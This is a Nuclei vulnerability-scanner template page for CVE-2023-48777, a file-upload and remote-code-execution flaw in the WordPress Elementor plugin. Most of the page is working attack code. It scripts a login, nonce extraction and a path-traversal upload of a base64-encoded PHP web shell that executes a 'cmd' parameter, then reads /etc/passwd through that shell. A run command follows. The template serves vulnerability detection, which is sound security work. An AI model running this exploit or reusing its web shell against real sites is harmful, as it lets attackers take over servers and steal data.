Skip to content
Nuclei Templates

WordPress Elementor 3.18.1 - File Upload/Remote Code Execution

ID: CVE-2023-48777

Severity: critical

Author: DhiyaneshDK

Tags: cve,cve2023,elementor,file-upload,intrusive,rce,wpscan,wordpress,wp-plugin,authenticated

Description

Section titled “Description”

The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.

YAML Source

Section titled “YAML Source”
id: CVE-2023-48777


info:
  name: WordPress Elementor 3.18.1 - File Upload/Remote Code Execution
  author: DhiyaneshDK
  severity: critical
  description: |
    The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.
  remediation: Fixed in 3.18.2
  reference:
    - https://wpscan.com/vulnerability/a6b3b14c-f06b-4506-9b88-854f155ebca9/
    - https://patchstack.com/database/vulnerability/elementor/wordpress-elementor-plugin-3-18-0-arbitrary-file-upload-vulnerability?_s_id=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2023-48777
    cwe-id: CWE-434
    epss-score: 0.00054
    epss-percentile: 0.21518
    cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:wordpress:*:*:*
  metadata:
    verified: true
    max-request: 4
    framework: wordpress
    publicwww-query: "/wp-content/plugins/elementor/"
    product: website_builder
    vendor: elementor
  tags: cve,cve2023,elementor,file-upload,intrusive,rce,wpscan,wordpress,wp-plugin,authenticated
variables:
  filename: "{{rand_base(6)}}"
  payload: '{"import_template":{"action":"import_template","data":{"fileName":"/../../../../{{filename}}.php","fileData":"PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4="}}}'


http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        log={{username}}&pwd={{password}}&wp-submit=Log+In


      - |
        GET /wp-admin/post.php?post=1&action=elementor HTTP/1.1
        Host: {{Hostname}}


      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        actions={{url_encode(payload)}}&_nonce={{nonce}}&editor_post_id=1&initial_document_id=1&action=elementor_ajax


      - |
        GET /wp-content/{{filename}}.php?cmd=cat+/etc/passwd HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body_4)"
          - "status_code_4 == 200"
        condition: and


    extractors:
      - type: regex
        internal: true
        name: nonce
        part: body
        group: 1
        regex:
          - 'admin\\\/admin\-ajax\.php","nonce":"([0-9a-z]+)"'
# digest: 490a0046304402205b9e17dfd046edb0499a7edcf146a216af74e00790db041011fad6534f3c349702205001912dd2d0c3fbaabfd273a7d22740cfc316bcbd6b51c58f4dd8304bc8c698:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-48777.yaml"

View on Github